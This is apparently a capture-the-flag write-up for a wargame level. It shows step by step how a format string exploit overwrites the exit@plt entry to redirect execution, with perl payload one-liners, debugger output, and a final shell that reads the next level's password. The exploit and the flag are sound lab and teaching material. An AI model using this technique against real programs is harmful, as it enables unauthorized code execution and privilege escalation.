we need to enter the o() function, for that we will do a Code Execution Redirect
using Format String Exploit

exit@plt is called right after printf and is at 0x080483d0 address,
we need to overwrite the jump instruction to jump to o address
It's like 'set {int}0x8049838=0x80484a4' but with the format string
	
	perl -e 'print "\x38\x98\x04\x08" . "%4\$n" . "\n"' > /tmp/lvl5
	Program received signal SIGSEGV, Segmentation fault.
	0x00000004 in ?? ()

We successfully overwritten the jump but as we only printed 4 characters
, we only set the jump address to 0x4. The next step is to
print 0x80484a4 (134513828) or 134 Mo spaces before %n. We should split the address in two

0x804 =		2052
0x84a4 =	33956

	perl -e 'print "\x38\x98\x04\x08" . "\x3a\x98\x04\x08" . "%4\$hn" . "AAAA" . "%5\$hn" . "\n"' > /tmp/lvl5
	Program received signal SIGSEGV, Segmentation fault.
	0x000c0008 in ?? ()

The string should be:
[addr1][addr2][2044 char](edit 2 highest bytes)[33956 - 2052 char](edit 2 lowest bytes)

	perl -e 'print "\x3a\x98\x04\x08" . "\x38\x98\x04\x08"\
	. "%2044x" . "%4\$hn" . "%31904x" . "%5\$hn" . "\n"' > /tmp/lvl5

	cat /tmp/lvl5 - | ./level5
	[...]
	whoami
	level6
	cat /home/user/level6/.pass
	d3b7bf1025225bd715fa8ccb54ef06ca70b9125ac855aeab4878217177f41a31
